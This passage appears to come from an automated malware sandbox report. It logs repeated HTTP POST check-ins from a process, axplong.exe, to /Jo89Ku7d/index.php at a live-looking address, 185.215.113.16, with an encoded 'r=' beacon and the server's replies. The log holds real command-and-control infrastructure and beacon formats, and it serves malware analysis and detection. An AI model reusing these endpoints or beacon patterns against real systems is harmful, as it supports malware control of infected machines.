                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              48192.168.2.651130185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:00.335089922 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:01.144354105 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:01.146190882 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:01.407320023 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              49192.168.2.651131185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:01.525332928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:03.069415092 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:03.070761919 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:03.070935011 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:03.096155882 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:03.342699051 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              50192.168.2.651132185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:03.464626074 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:04.385667086 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:04 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              51192.168.2.651133185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:04.395015001 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:05.173918962 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              52192.168.2.651134185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:05.294424057 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:06.057610035 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              53192.168.2.651135185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:06.066302061 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:06.812999010 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:06 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              54192.168.2.651136185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:06.933584929 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:07.711100101 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:07 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              55192.168.2.651137185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:07.721373081 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:08.493729115 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              56192.168.2.651138185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:08.619985104 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:09.392926931 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:09.397387981 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:09.688348055 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:09 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              57192.168.2.651139185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:09.818468094 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:10.609327078 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:10 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              58192.168.2.651140185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:10.618573904 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:11.387840986 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:11 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              59192.168.2.651141185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:11.514400959 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:12.267776966 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              60192.168.2.651142185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:12.277200937 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:13.047894001 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:12 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              61192.168.2.651143185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:13.165870905 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:13.931571007 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              62192.168.2.651144185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:13.947204113 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:14.728379965 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              63192.168.2.651145185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:14.857645988 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:15.612291098 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:15 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              64192.168.2.651146185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:15.621970892 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:16.372337103 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:16 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              65192.168.2.651147185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:16.510842085 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:17.266690016 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              66192.168.2.651148185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:17.276571035 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:18.052725077 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:17 GMT
                              Content-Type: text/html; charset=UTF-8
